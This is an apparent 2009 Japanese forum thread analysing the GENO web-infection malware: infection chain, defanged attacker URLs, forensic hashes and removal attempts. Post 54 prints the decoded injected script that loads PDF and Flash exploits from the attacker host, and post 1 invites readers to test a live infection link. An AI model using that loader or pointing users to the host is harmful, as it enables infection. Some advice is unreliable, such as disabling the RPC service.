GENOウイルススレ
at SEC
1:名無しさん@お腹いっぱい。
09/04/08 10:09:39
(1)感染したWebページをひらく
(2)感染したjsが、94.247.2.195の改変jquery.jsを実行
(3)IP/UAで振り分け処理(Vistaは大丈夫そう?)
(4)PDF/Flash起動。各種ウィルス本体をInternetTempに展開
(5)bufferOverrunでウィルス本体の起動を試行
以下が問題のURL、
"id=2"はpdfの脆弱性を利用し、
buffer overflowを引き起こさせ感染を試みる。(Adobe Collab overflow)
"id=3"はswf(Flash)の脆弱性を利用しoverflowを引き起こさせ、感染を試みる。
いずれも最新のFlash Playerの導入とPDF Readerを入れていれば問題なし(?)
hxxp://94.247.2.195/jquery.js
hxxp://94.247.2.195/news/?id=100
hxxp://94.247.2.195/news/?id=2
hxxp://94.247.2.195/news/?id=3
リンクは切れており現在無害(当環境では)
以下のリンクは生きており感染実験希望の方はドゾ
★危険ですので注意
hxxp://94.247.2.195/news/index.php
少しわかってること:
WINDOWSの正規ファイルを上書き(?)する可能性大
Anubisレポート
URLリンク(anubis.iseclab.org)
2:名無しさん@お腹いっぱい。
09/04/08 10:36:01
関連スレ
【客の返品】GENOを語るスレ29【オク出品】
スレリンク(pc板)l50
【ウイルス感染】GENOを語るスレ30【アクセス注意】
スレリンク(pc板)l50
3:名無しさん@お腹いっぱい。
09/04/08 10:41:30
関連スレ
【0.1】ネットショップ「GENO」等でウイルス感染 業務再開するもGENOサイドは「キャッシュ消せ」とふざけた対応★9
スレリンク(news板)l50
GENOなどのサイトでウイルス感染★8
スレリンク(news板)l50
★090406 複数板「ウイルスGeno短縮URL」誘導マルチポスト荒らし報告
スレリンク(sec2chd板)l50
【ウィルス情報質問 総合スレッド★Part46】
スレリンク(sec板:690-番)
4:名無しさん@お腹いっぱい。
09/04/08 10:41:58
GENOの対応酷いな
まあ自力で駆除はかなり面倒だけど
5:名無しさん@お腹いっぱい。
09/04/08 10:51:40
GENOは被害者
6:名無しさん@お腹いっぱい。
09/04/08 10:52:14
Proxomitron用対策フィルタ。
[Patterns]
Name = "GENO Virus Killer"
Active = TRUE
Limit = 512
Match = "<!-- (document.write\(unescape\([^\n]+)\0 -->"
Replace = "<!-- !!! GENO Virus !!! -->$ALERT( !!! GENO Virus !!!\n\0 )"
7:名無しさん@お腹いっぱい。
09/04/08 10:56:32
>>1
おつ
8:名無しさん@お腹いっぱい。
09/04/08 10:57:32
IIIII NAXOS その6 IIIII
スレリンク(classical板:748番)
9:名無しさん@お腹いっぱい。
09/04/08 11:01:51
セキュリティ対策【危険ポートを閉じる】
【ポート135の役割】
Windows2000/XPは、標準で分散オブジェクト技術(以下:DCOM)を利用しています。
このDCOMを利用すると、他のPCのDCOMソフトを遠隔操作できます。
遠隔操作をする場合に、相手PCに問い合わせをする時のに使用するのがポート135です。
場合によっては、遠隔操作をされてしまう可能性があるものですので、このポートは停止しておきましょう。
ポート番号「135」、「リモート管理・操作等のサービスへのアクセス」
■ポート135を閉じる
「コントロールパネル」 -> 「管理ツール」 -> 「サービス」 -> 「Remote Procedure Call」を選択する。
「Remote Procedure Call (RPC) エンド ポイント マッパーや各種の RPC サービスを提供します。」
をダブルクリックし、プロパティを開く。
スタートアップの種類を「無効」にし、OKボタンをクリックしプロパティ画面を閉じる。
変更をしたらPCを再起動する。
ポート番号「445」、「ファイル共有等のサービスへのアクセス」
■ポート445を閉じる
「コントロールパネル」 ->「システム」 ->「ハードウェア」 ->「デバイスマネージャ」の「表示」メニューから
「非表示のデバイスドライバの表示」を選ぶと「プラグアンドプレイではないドライバ」という項目が一覧に加わる。
このツリーを展開して「NetBIOS over TCP/IP」のプロパティを開く。
ここで「ドライバ」タグを選択し、「スタートアップ」の種類を「無効」にする。
変更をしたらPCを再起動する。
Web-based DNS Randomness Test | DNS-OARC
URLリンク(www.dns-oarc.net)
を踏んでみて、もし万一「POOR」って表示されたら、
そのDNSはセキュリティ的に「もうだめぽ」ということ。
10:名無しさん@お腹いっぱい。
09/04/08 11:08:01
GENO以外にもあちこちで報告出てるなー
**** 価格比較のECナビ Part43 ****
スレリンク(point板:84-120番)
11:名無しさん@お腹いっぱい。
09/04/08 11:09:52
ComboFix(Geekは可)は特定のサイトからのダウソはブロックされるね
DDSも起動せず。
ただComboFixで自動処理するとアカウントにログイン出来なくなる
(正規ファイルを悪玉ファイルに上書き→ComboFixが処理?)
駆除失敗(・ω・`)
12:名無しさん@お腹いっぱい。
09/04/08 11:35:19
GENO系の最新情報集めてるスレない?
ニュー速がいちばん人居るのかな
13:名無しさん@お腹いっぱい。
09/04/08 11:44:32
ニュー速だね。
>>8、>>10の他にも感染サイトの情報がカキコされてる。
14:名無しさん@お腹いっぱい。
09/04/08 11:59:04
d
張り付いとくか…
15:名無しさん@お腹いっぱい。
09/04/08 12:24:45
とりあえずまとめる場所だけ作ったからだれか編集よろしく
URLリンク(www29.atwiki.jp)
16:名無しさん@お腹いっぱい。
09/04/08 12:47:26
>>11
hijackthis、RSITあたりでログ取っても感染ファイルが見当たらない
何でだろう
モニタリングソフト使って把握するしかないんか
めんどくせ
17:名無しさん@お腹いっぱい。
09/04/08 13:33:48
PC通販サイト「GENO」のサイトに改ざんの疑い
URLリンク(internet.watch.impress.co.jp)
PC通販ショップGENOのサイトにマルウェアが仕込まれる
URLリンク(www.excite.co.jp)
アイティメディア株式会社 : 当社サイトにて掲載した広告のリンク先ページにおけるウイルス感染について ご報告と対処のお願い
URLリンク(corp.itmedia.co.jp)
18:名無しさん@お腹いっぱい。
09/04/08 13:44:23
>>2-3
ウイルス注意!お前等しばらくzipやリンク踏むなよ!!
スレリンク(news4vip板)
19:名無しさん@お腹いっぱい。
09/04/08 13:49:58
今感染してみたけど動作してんのか?
ファイル生成→自身を削除
で終わりなんだけど
ただIEが凄い不安定だ
20:名無しさん@お腹いっぱい。
09/04/08 14:09:22
どんな挙動をするか本当の所はまだ判明してないのに…
これからの報告に期待する
人柱乙
21:名無しさん@お腹いっぱい。
09/04/08 14:13:39
仮想で踏んで分析してくれてるんじゃまいか
22:名無しさん@お腹いっぱい。
09/04/08 14:35:13
>>18
踏んでいいの?怖いんだけど
23:名無しさん@お腹いっぱい。
09/04/08 14:37:54
GENO ウイルス に一致する日本語のページ 約 42,800 件中 51 - 100 件目 (0.21 秒)
URLリンク(www.google.com)
24:名無しさん@お腹いっぱい。
09/04/08 15:14:22
SDFixも動かない
悪玉ファイルは見つからない
どうなってんの?
25:名無しさん@お腹いっぱい。
09/04/08 15:24:14
URLリンク(www.security-next.com)
26:名無しさん@お腹いっぱい。
09/04/08 15:38:47
PDF ReaderもFlash Player最新だったんだけどなあ
27:名無しさん@お腹いっぱい。
09/04/08 15:44:40
adobeのPDF導入してなくても感染したって話もあったからコワイね。
未だに挙動含めてはっきりしたことわからない。
28:名無しさん@お腹いっぱい。
09/04/08 15:51:17
今回は既知の脆弱性を突いたウィルスだったけど、
これが未対応・未発表の脆弱性とかだったらと思うとブルブル
29:名無しさん@お腹いっぱい。
09/04/08 15:53:34
サイトを乗っ取られる会社がアホなんだよ。
30:名無しさん@お腹いっぱい。
09/04/08 15:54:01
sqlsodbc.chmファイルが上書きされて
乗っ取られた正規ファイルがsqlsodbc.chmにアクセスしまくってるんだけど
もう諦める。
31:名無しさん@お腹いっぱい。
09/04/08 16:27:40
GENO ウイルス ニュース検索結果
URLリンク(news.google.co.jp)
32:名無しさん@お腹いっぱい。
09/04/08 16:35:14
>9
Source Port Randomness: GREAT
All
33:名無しさん@お腹いっぱい。
09/04/08 16:43:05
【0.1】ネットショップ「GENO」等でウイルス感染 業務再開するもGENOサイドは「キャッシュ消せ」とふざけた対応★9
スレリンク(news板)
【緊急警報】GENOなどのサイトでウイルス感染(2ちゃんに貼られた不明なリンクへも飛ぶべからず!!)
スレリンク(pcnews板)
34:名無しさん@お腹いっぱい。
09/04/08 16:46:43
せめてオンラインスキャン程度薦めてくれれば擁護のしようもあるのだが
35:名無しさん@お腹いっぱい。
09/04/08 16:52:09
>>19
レジストリエディタの起動を阻止したり、自身を削除する前にいろいろやってる模様。
面倒くさいので、OS入れなおした。
36:名無しさん@お腹いっぱい。
09/04/08 16:54:14
行徳のSTEPの時代からひいきにしてたのに実に残念だ
37:名無しさん@お腹いっぱい。
09/04/08 17:54:16
ν速からきますた。。。
>>19,35
ν速のスレでうpされたLa.exeのバイナリをUPX圧縮を解除してバイナリエディタで中を覗いたけど、
どうもLa.exeではKドライブにある _t というフォルダを消して、_tフォルダ内のu.batを消している感じの文字列が見えた。
恐らくこの _t というフォルダの中がどうなっているのかを調べたら
具体的にどんな内容が盗み出されているかが判るんじゃないかなって思うよ。
ただ、ちょっと疑問なのはν速のスレで感染したらしき人の報告ではCドライブの直下にu.batが出来ていたらしいって事。
もしかするとこのEXEの前に予めジャンクションを張っているのか、KドライブにCドライブのどこかにある_tフォルダを
SUBSTしてるのかも知れない。
感染した状態で即効でこの _k フォルダの中身を調べてしまえばよいのかと。
38:名無しさん@お腹いっぱい。
09/04/08 17:57:38
× 感染した状態で即効でこの _k フォルダの中身を調べてしまえばよいのかと。
○ 感染した状態で即効でこの _t フォルダの中身を調べてしまえばよいのかと。
訂正。
39:名無しさん@お腹いっぱい。
09/04/08 18:02:23
>>37
La.exeとGENOウイルスは同じものかい?
40:名無しさん@お腹いっぱい。
09/04/08 18:04:38
>>37
そんな感じだけど解析困難だよ
41:名無しさん@お腹いっぱい。
09/04/08 18:07:36
>>39
それはおいらが食らった訳じゃないから確証は持てない。
あくまで自称食らった人がうpしたものを解析しただけなんで。
42:名無しさん@お腹いっぱい。
09/04/08 18:11:13
Kドライブは汎用機だな
>>39
ランダム名
43:名無しさん@お腹いっぱい。
09/04/08 18:13:06
MDLに94.247.*.*
が沢山あるな。
登録日見ると今年に入って頑張って流行らせようとしてるみたい。
44:名無しさん@お腹いっぱい。
09/04/08 18:14:34
>>40
恐らく食らっててCPU負荷高い状況だと難しいと思う。
自ら言っておいてこんな事言うのはなんだけど。
45:名無しさん@お腹いっぱい。
09/04/08 18:17:02
URLリンク(anubis.iseclab.org)
u.batあたりの挙動はここにまとめられてる
46:名無しさん@お腹いっぱい。
09/04/08 18:18:39
>>39
まったく同じとは言い切れないがほぼ一緒か?。
GENOとcrestronjapan.com、>>1の生きているリンクから踏んだけど
どれも共通してu.batが生成されたから同じような動きをしてる希ガス。
47:名無しさん@お腹いっぱい。
09/04/08 18:27:01
このウイルスに感染すると、
・特定のサイトに接続できなくなる
・特定の駆除ソフト、ログ取得ソフトがブロックされる(DDS、SDFix類がブロックされる)
・レジストリエディタが起動しない(リネームすることにより回避可能)
・ネットブラウジングが困難になる。(問題発生しまくり)
・sqlsodbc.chmにWindowsの正規プログラム(?)がやたらとアクセスしてる
・Windowsの正規プログラムがsqlsodbc.chmを作成したりする。
おれの環境では不正なサイトにアクセスは確認できなかった
sqlsodbc.chm←これヘルプファイルだし特に危険じゃないと思うんだけど
何なんだ
48:名無しさん@お腹いっぱい。
09/04/08 18:32:00
>>47
HTMLヘルプの脆弱性でも狙ってるとか
49:名無しさん@お腹いっぱい。
09/04/08 18:33:04
>>47
あくまで推測だけど、PDFファイルやFlashファイルでバッファオーバーフローの脆弱性を突いたみたいに
HTMLヘルプのhh.exeにも同じ様な脆弱性があって、それを突いてくるファイルなのかと。
50:名無しさん@お腹いっぱい。
09/04/08 18:35:31
AMD64のCPUに替えれば無問題
51:名無しさん@お腹いっぱい。
09/04/08 18:38:00
- Files Created:
C:\bgrn.mym
C:\u.bat
- Files Read:
C:\WINDOWS\system32\sqlsodbc.chm
- Files Modified:
C:\WINDOWS\system32\sqlsodbc.chm
C:\bgrn.mym
C:\u.bat
- Files Deleted:
C:\_.t
C:\u.bat
52:名無しさん@お腹いっぱい。
09/04/08 18:38:01
CVE-2009-0119だったりして
53:名無しさん@お腹いっぱい。
09/04/08 18:44:24
>>47
ウチの環境じゃ
・IEが死にまくる
・OEが死にまくる
・cmd.exeが起動しない
っていう症状が出てる。
54:名無しさん@お腹いっぱい。
09/04/08 18:44:43
hxxp://94.247.2.195/news/index.php
↓デコードしてみた
document.write("<div style=\"position:absolute; left:-1000px; top:-1000px;\">");
var obj=null;try{obj=new ActiveXObject("AcroPDF.PDF");}catch(e){}if(!obj){try{obj=new ActiveXObject("PDF.PdfCtrl");
}catch(e){}}if(obj)document.write('<embed src="URLリンク(94.247.2.195)" width=100 height=100 type="application/pdf"></embed>');
try{var FV=0;FV=(new ActiveXObject("ShockwaveFlash.ShockwaveFlash.9")).GetVariable("$"+"version").split(",");
}catch(e){}if(FV&&(FV[2]<124))document.write('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width=100 height=100 align=middle>
<param name="movie" value="URLリンク(94.247.2.195)"/><param name="quality" value="high"/>
<param name="bgcolor" value="#ffffff"/><embed src="URLリンク(94.247.2.195)"/></embed></object>');document.write("</div>");
55:名無しさん@お腹いっぱい。
09/04/08 18:47:03
>>53
windows update繋がります?
56:54
09/04/08 18:47:23
↑リンク外すの忘れてました;;
57:名無しさん@お腹いっぱい。
09/04/08 18:48:43
>>55
繋がったような希ガス
今当該機器はオフラインなので確認できない
ただシステムログにWindowsアップデート関連のエラーが一件出てた
58:名無しさん@お腹いっぱい。
09/04/08 18:49:05
オイオイ
59:名無しさん@お腹いっぱい。
09/04/08 18:58:44
いろいろExplorer.exe壊したw
60:名無しさん@お腹いっぱい。
09/04/08 19:04:21
la.exeを実行したら
sqlsodbc.chm
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32\aux
HKLM\SYSTEM\ControlSet001\Control\Session Manager\PendingFileRenameOperations
を書き換えるよとcomodoさんが言った
61:名無しさん@お腹いっぱい。
09/04/08 19:06:39
WikiのKaspersky、Nortonで駆除で来たってネタだろw
バリバリ感染した状態でANTIDOTE(カスペエンジン)最新にして
スキャンかけたけど問題のjsファイルしか引っかからなかったぞw
当然症状は治らず
つまりアンチウイルスは役に立たない
必死にオンラインスキャンしてるくらいだったらリカバリーするべき
62:名無しさん@お腹いっぱい。
09/04/08 19:14:26
カスペのオンラインスキャンをやろうと思ったのですが、
アプリケーションのデジタル証明にエラーがあります。〜
と出るのですが、気にせず実行してよいものなのでしょうか?
それとも皆様はこの表示出ません?
63:名無しさん@お腹いっぱい。
09/04/08 19:14:54
自作PC板
【馬鹿】GENOを語るスレ23【ID版に移動】
スレリンク(jisaku板)l50
【顧客相手に】GENOを語るスレ24【サイバージェノサイド】
スレリンク(jisaku板)l50
64:名無しさん@お腹いっぱい。
09/04/08 19:15:08
Windows NT
( ゚Д゚)ポカーン
65:名無しさん@お腹いっぱい。
09/04/08 19:17:37
>>52
マイクロソフトWindows CHMファイル処理バッファオーバーフロー脆弱性
問題のため、CHMファイルを処理するとき、マイクロソフトWindowsはバッファオーバーフロー脆弱性の傾向があります。
首尾よくこの問題を利用するのに、攻撃者は、メモリを崩壊させて、これらのファイルに関連しているアプリケーションを墜落させるでしょう。
この問題の本質を考えて、また、攻撃者は勝手な規準を実行できるかもしれませんが、これは確認されていません。
Windows XP Service Pack3は被害を受け易いです。 また、他のバージョンは影響を受けるかもしれません。
66:名無しさん@お腹いっぱい。
09/04/08 19:21:42
>>64
67:名無しさん@お腹いっぱい。
09/04/08 19:34:11
>>60
で、実害は?
68:名無しさん@お腹いっぱい。
09/04/08 19:35:55
今のところの感染確認方法は「sqlsodbc.chm」のタイムスタンプが最近だったらm9(^Д^)
古かったら⊂(^ω^)⊃セフセフ か
69:名無しさん@お腹いっぱい。
09/04/08 19:37:09
未だ修正が行われない crestronjapan.com だが、ヘッダにこんなんあった。
<meta name="generator" content="Movable Type Open Source 4.12" />
70:名無しさん@お腹いっぱい。
09/04/08 19:37:40
現状
>>47みたいな症状が確認されてる?のかな
特定のサイトに繋がらないってのが味噌なのかもしれん
71:名無しさん@お腹いっぱい。
09/04/08 20:09:37
なるほど、メモリ上のexeだけ書き換えられるのね。
72:名無しさん@お腹いっぱい。
09/04/08 20:09:52
>>70
【ウイルス感染】GENOを語るスレ30【アクセス注意】
スレリンク(pc板)
887 名前:名無しさん[sage] 投稿日:2009/04/08(水) 19:48:23 0
家のPCがモロ感染してたので人柱ってみた。。
結論から言うと、感染者は再インスコしかなさそう。
所要システムファイルが書き換えられてて、修復のしようがない。
で、元凶の書き換え元ファイルはまだ特定できないんだが、
とりあえずC:\WINDOWS\agh.givが作成されてて、
消しても即生成されるようなので、同名ファイルがある人は注意ね。
また追って人柱ってみます。。
889 名前:887[sage] 投稿日:2009/04/08(水) 19:52:50 0
ちなみに、カスペやトレンドマイクロのオンラインスキャンでは全く感知せず。
新種のウイルスだと思われ。
今んとこ、書き換えられてる(メモリ上書きされてる?)プロセスは以下の通り。
svchost.exe
spoolsv.exe
exproler.exe
alg.exe
winlogon.exe
おそらくファイル自体は書き換えられてない。
だからアンチウイルスでもヒットしない。
ちなみに、cmd.exeを実行したら一気に発祥したので、
疑いのある人はcmd.exeを実行しないように。
73:名無しさん@お腹いっぱい。
09/04/08 20:09:57
>>69
ほう。OSやhttpdはバラバラなようだから、MT(もしくはDB)の脆弱性なのか?
74:名無しさん@お腹いっぱい。
09/04/08 20:12:37
>>68
少なくてもCHMファイルの作成日時もしくは更新日時がウィルスを踏んで食らった時刻か、
丁度9時間ズレの時刻になってると感染確定だね。
ただ、このCHMファイルが書き換えられていなくても、
他の書き換えが行われている可能性もゼロじゃないから、
この件だけで感染の判断材料に使うのは危険だと思う。
75:名無しさん@お腹いっぱい。
09/04/08 20:15:30
>>69
なんかOSやHTTP鯖の種類もバラバラだけど、
CMSの種類までバラバラなのか。
Genoは確かWordPressだったでしょ。
76:名無しさん@お腹いっぱい。
09/04/08 20:23:20
上のと動作が微妙に違うみたい
URLリンク(anubis.iseclab.org)
77:名無しさん@お腹いっぱい。
09/04/08 20:26:48
>>75
進入経路が確定しないってのもヤだよな。
URLリンク(www3.atword.jp)
ここで紹介されてるパターンだと、FTPのパスワードが盗まれた(簡単過ぎた?)ことが
原因らしいが・・・・・。
未だサイトを閉じないパピーヌと日本クレストロンはどう対処する気なんだ。
クレストロンは鯖が米国にあるっぽいので向こうの営業時間(明日未明)にならんと
対策されん希ガス。
78:名無しさん@お腹いっぱい。
09/04/08 20:29:05
>>74
踏んだ時刻を大体覚えてればCドライブの一週間以内に変更されたファイルを
検索して踏んだ時刻近辺に変更されたファイルを精査すれば感染/非感染が分かりそう。
自分のをざっとやってみたけど踏んだ時間近辺で変更されてるのは専ブラのdatと
avastのログファイルくらいだった。
chmはヘルプファイルだから最近インスコしたソフトがなければそう簡単に更新されたり
しないから分かり易いね。
79:名無しさん@お腹いっぱい。
09/04/08 20:34:05
だからメモ帳起動するとnotepad.exeが変な動きしたりしてたのか。
notepad.exe
ApntEx.exe
imapi.exe
lsass.exe
他...
結論は>>71か。
ウイルスの主な活動は乗っ取った正規プログラムで、
後はその家庭で作成したファイルを削除しちゃうからログ取得ツールにも表れないわけだ
80:名無しさん@お腹いっぱい。
09/04/08 20:36:12
>>77
もしかすると前にν速のスレでおいらが半分冗談で言ってたんだけど、
ウィルス付きメール等で事前に内部的にパスワードが盗まれて
その後堂々とFTPログインされて好き勝手に書き換えられたのかも知れないね。
あまりに杜撰すぎるけど、他で爆発的に感染していない所を見ると
この種の致命的なオペレーションレベルでのミスを見過ごしてこーいう事態を招いたのかも知れないね。
いずれにしても食らった楽天のショップが特定の1件だけって所が妙だと個人的には思ってて、
単純に外部からアタックされてやられるのならもっと楽天のショップが大量に食らっててもおかしくない話だからね。
81:60
09/04/08 20:41:52
アスロンでデータ実行防止してるPCのvirtualPC上のXPsp2で実行ね
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32\aux
は%実行フォルダ%\..\bcrg.rhn(名前はランダムかも)
HKLM\SYSTEM\ControlSet001\Control\Session Manager\PendingFileRenameOperations
は
\??\C:\_.t
になってた
sqlsodbc.chm はファイルサイズが本来50727byteから1323byteへ。
タイムスタンプは多分変わらず作成日時と更新日時が2004/08/10
そのまま再起動するも異常に時間がかかるので電源off
セーフモードで再起動->システムの復元をしたがsqlsodbc.chmは改変されたまま
そのままsqlsodbc.chmを踏んでみたけど
mk::@MSITStore:C:\WINDOWS\system32\sqlsodbc.chm を開けません。
とダイアログが出るだけ
あとはわからん
82:名無しさん@お腹いっぱい。
09/04/08 20:44:46
>>80
一応海外にも被害は出てて拡散しているらしい
日本人は英語のスパムにはそうそう釣られないと思うんだよなあ
こんなのがあった
URLリンク(www3.atword.jp)
83:名無しさん@お腹いっぱい。
09/04/08 20:46:56
>>81
CHMファイルのタイムスタンプはオリジナルのままなのか。。。
84:名無しさん@お腹いっぱい。
09/04/08 20:50:17
>>81
VPC動作したのか・・・orz
感染したと思いこんでるやつように確認方法として
・ブラウジング中によく落ちる
・sqlsodbc.chmが改変されていないか確かめてみる
↓みんなこの値?
(MD5 f639afde02547603a3d3930ee4bf8c12)
85:名無しさん@お腹いっぱい。
09/04/08 20:50:24
>>82
そこはさっき目を通したわ。
リンクが紫だw
昨夜明け方にラトビアのIP等を元にぐぐったら
3/28頃から中国、アメリカ、フランス、イタリア等の掲示板で
感染サイトらしき所のWebマスターの相談のスレッドが立ってたりしたわ。
86:名無しさん@お腹いっぱい。
09/04/08 20:51:23
>>84
sqlsodbc.chmはタイムスタンプじゃなくてハッシュで確認しないと駄目だね。これ。
87:84
09/04/08 20:52:01
VPC上で動作したのか・・・orz
に訂正・・・
88:名無しさん@お腹いっぱい。
09/04/08 20:52:09
GENOウイルスが世界デビューしてる
89:名無しさん@お腹いっぱい。
09/04/08 20:59:27
これ拡大すんの?
90:名無しさん@お腹いっぱい。
09/04/08 20:59:56
件のサイト群は見てないのに、Wikiに書いてあるcmd.exeが勝手に動いてて
メモリを消費してるという感染済みっぽい挙動を確認したんだけど
やっぱ報告されてないだけで世界的に感染してるHPがあるんかな。
暫くはまともにネット見れなさそうね。
91:名無しさん@お腹いっぱい。
09/04/08 21:00:22
>>84
だね>ハッシュ値
92:名無しさん@お腹いっぱい。
09/04/08 21:01:32
>>89
少しずつ改竄報告増えてるね。
もしリカバリしてもまたほかで踏みそうなきもする。
93:名無しさん@お腹いっぱい。
09/04/08 21:03:18
詳細が分かるまでVMで大人しくネットするしかないな
94:84
09/04/08 21:06:31
だれかハッシュ値確認お願いしませう
95:名無しさん@お腹いっぱい。
09/04/08 21:12:38
>>84
同じ
96:名無しさん@お腹いっぱい。
09/04/08 21:12:58
>>94
MD5 (sqlsodbc.chm) = f639afde02547603a3d3930ee4bf8c12
XP,SP3
97:名無しさん@お腹いっぱい。
09/04/08 21:13:16
もとからsqlsodbc.chmなんてファイルがないんだが・・・
98:名無しさん@お腹いっぱい。
09/04/08 21:14:03
>>84
XP SP3
タイムスタンプが2004/08/05 21:00だが、ハッシュは同じ
99:名無しさん@お腹いっぱい。
09/04/08 21:14:30
>>84
無印XPにSP3を適用してWindowsUpdate 当てまくりで
何回かテストで踏んでるけど、全てNorton先生に撃退してもらってる環境。
一致してる。詳細は↓の通り。
ついでに全然感染サイトを踏んでいないファイルサーバーのServer2003SP2のも
タイムスタンプこそ↓とは違うけどCRC32,MD5共に一致してる。
sqlsodbc.chm
C:\WINDOWS\system32
50,727バイト
作成日時
2001年8月27日 月曜日、21:00:00
更新日時
2001年8月27日 月曜日、21:00:00
CRC32
B61C7A80
MD5
F639AFDE02547603A3D3930EE4BF8C12
100:名無しさん@お腹いっぱい。
09/04/08 21:21:23
踏んでウイルス食らった後に、検出できるのか?
他スレで完全スルーしたって話でてるな・・
101:名無しさん@お腹いっぱい。
09/04/08 21:21:29
と思ったらちゃんとあったw
f639afde02547603a3d3930ee4bf8c12 c:\windows\system32\sqlsodbc.chm
102:名無しさん@お腹いっぱい。
09/04/08 21:27:32
adobeサイトでフラッシュとリーダーを更新しようとしたら
IE7がフリーズするんだけど感染してるのかな?
sqlsodbc.chmのハッシュは
f639afde02547603a3d3930ee4bf8c12 なんだけど・・・
103: ◆N9P3SuvBPo
09/04/08 21:29:08
>99
特攻機で踏んだけど、作成日とか違えどサイズもハッシュもあなたのと同じです。
104:名無しさん@お腹いっぱい。
09/04/08 21:35:17
/)
///)
/,.=゙''"/
/ i f ,.r='"-‐'つ____ キャッシュ削除すりゃぁいいんだよ!!
/ / _,.-‐'~/⌒ ⌒\
/ ,i ,二ニ⊃( ●). (●)\
/ ノ il゙フ::::::⌒(__人__)⌒::::: \
,イ「ト、 ,!,!| |r┬-| |
/ iトヾヽ_/ィ"\ `ー'´ /
105:名無しさん@お腹いっぱい。
09/04/08 21:45:48
VISTAは感染しないって本当なの?
106:名無しさん@お腹いっぱい。
09/04/08 21:49:46
>>105
だからまだウィルスの全貌が解明すらされていないのに
「○○なら大丈夫」っていう安易は発想はしないほうがいいよ。
無闇に怯えるのもアフォだけど、やたらに過信するのもヴァカだと思う。
107:名無しさん@お腹いっぱい。
09/04/08 21:57:33
GENOウイルスはなかった
108:名無しさん@お腹いっぱい。
09/04/08 21:57:59
>>90
Adobe ReaderやFlashが古い状態だと可能性あります
ちなみに踏んだURLを教えてくれると助かる
直接貼られると危ないんでリンク外れる程度におねがいします
もしくは他のウィルスに感染してたかです
109:名無しさん@お腹いっぱい。
09/04/08 21:59:26
>>105
Genoの場合はUserAgentで振り分けがあって
Vistaは対象外っぽかった
気まぐれかもしれないので確実に安全とはいえない
110:名無しさん@お腹いっぱい。
09/04/08 22:03:14
URLリンク(news.goo.ne.jp)
PC通販サイト「GENO」のサイトに改ざんの疑い
INTERNET Watch2009年4月8日(水)00:30
111:名無しさん@お腹いっぱい。
09/04/08 22:06:22
>>105
こういう話もあるよ。
スレリンク(news4vip板:448番)
448 以下、名無しにかわりましてVIPがお送りします 2009/04/07(火) 20:05:12.93 ID:jaXpHGCM0
まぁかなり話題になってるから知ってるだろうけど
アドビ9.0以前の脆弱性を付いたウイルスだから、今のうちに
更新しとけ
ちなみに感染してしまうとアドビが5分に1回ペースで更新を要求してくるという
鬱陶しさ(おそらくウイルスの仕様)
vistaならセーフって解釈は間違いで、vistaでも更新かけてない奴はアウト
ソースは昨年11月から未更新の俺のvista
112:名無しさん@お腹いっぱい。
09/04/08 22:11:52
>>108
騒ぎが起こる前にReaderは9.1.0、Flashも10.0.22.87にしてあった。
踏んだURLは本当に気付いたらこうなってたので
どれが原因かは分からない。すまん
avast!で今チェックが終わったところだけど、感染0だったから
他のウィルスではない、と思う。あとでカスペルスキー等も試さないと…
あと、ついでだからsqlsodbc,chmのハッシュ値とかも書いておく
50,727 バイト
作成日時 2007年5月15日、16:26:18
更新日時 2006年3月2日、21:00:00
MD5 F639AFDE02547603A3D3930EE4BF8C12
113:名無しさん@お腹いっぱい。
09/04/08 22:12:00
84と同じなら99%感染してないと思う
GENO含めその他のサイトで同ウイルスの感染実験したが
必ずsqlsodbcは改変された
亜種にすぐに変わるようなウイルスじゃなさそうだし、
有効な確認手段だと思う
感染してる場合は“a”から始まるハッシュ値だった(メモしわすれたorz)
114:名無しさん@お腹いっぱい。
09/04/08 22:14:58
今調べたんですが、ハッシュってソフト入れてそれで見るんですよね?
初心者質問本当に申し訳ない。
115:名無しさん@お腹いっぱい。
09/04/08 22:17:52
>>111
あー 感染してたっぽいなぁ俺w
>ちなみに感染してしまうとアドビが5分に1回ペースで更新を要求してくるという
ちなみにシステムの復元でそれはなくなった。
感染の兆候も見られない。
116:名無しさん@お腹いっぱい。
09/04/08 22:24:34
>>114
有名どころだと↓をインスコするとか。。。
外人さんが作った物だけど日本語表示化だから。
HashTab Shell Extension
URLリンク(www.forest.impress.co.jp)
作者サイト
URLリンク(beeblebrox.org)
117:名無しさん@お腹いっぱい。
09/04/08 22:27:40
>>116
ありがとうございます
118:名無しさん@お腹いっぱい。
09/04/08 22:27:56
UACあるのにVistaが感染するわけないだろjk
119:名無しさん@お腹いっぱい。
09/04/08 22:31:15
あきらめてクリンインストします・・・
120:名無しさん@お腹いっぱい。
09/04/08 22:34:30
sqlsodbc.chmがないんだけど・・・
121:名無しさん@お腹いっぱい。
09/04/08 22:36:06
感染してないのはここら辺の問題かと
URLリンク(www.atmarkit.co.jp)
122:名無しさん@お腹いっぱい。
09/04/08 22:37:30
クリーンインスコする前にcombofix使えよ
123:名無しさん@お腹いっぱい。
09/04/08 22:48:39
combofix使っても無駄だろ・・・・・
124:名無しさん@お腹いっぱい。
09/04/08 22:53:47
>>84
うちのは
CRC32: B61C7A80
MD5: F639AFDE02547603A3D3930EE4BF8C12
SHA-1: FBDD32ED13D27E4102621E1067FDF3634F33B2C3
と出ているのですけどこれは改変されていないのでしょうか?
125:名無しさん@お腹いっぱい。
09/04/08 22:54:41
>>124
大文字小文字の差異はあれ一致だね
126::名無しさん@お腹いっぱい
09/04/08 22:55:06
IEやFirefoxが不安定、regedit起動不可等
trojan.killAV に感染してた、ノートン試用版にて駆除
今のところおかしな動きなしです。
127:名無しさん@お腹いっぱい。
09/04/08 22:55:27
>>125
ありがとうございます。
128:名無しさん@お腹いっぱい。
09/04/08 22:56:58
感染した人のsqlsodbc.chmはやっぱり全然違うんかな
129:名無しさん@お腹いっぱい。
09/04/08 22:59:04
ノートンは対応したのか、NODはまだだよな?
130:11
09/04/08 23:05:27
sqlsodbc.chmの場所は
c:\windows\system32\sqlsodbc.chm
です。
Vistaであるかは後で確認する。
ComboFixは場合によってはログインできなくなるかも。
2回ComboFixで駆除を試みたけど、1回目は通常モードで実行して再起動後
ログインできなくなった。
2回目はセーフモードで試し、無事ログインもできたけど処理数0
(つまり何もウイルスを検出せず、ログにも怪しいものは見当たらず)
ComboFixを試すのはいいけどやるんだったらセーフモードで、
ログインできなくなるリスクもあるから自己責任で。。。
(ログインできなくなると、リカバリーCDからしかリカバリできないから
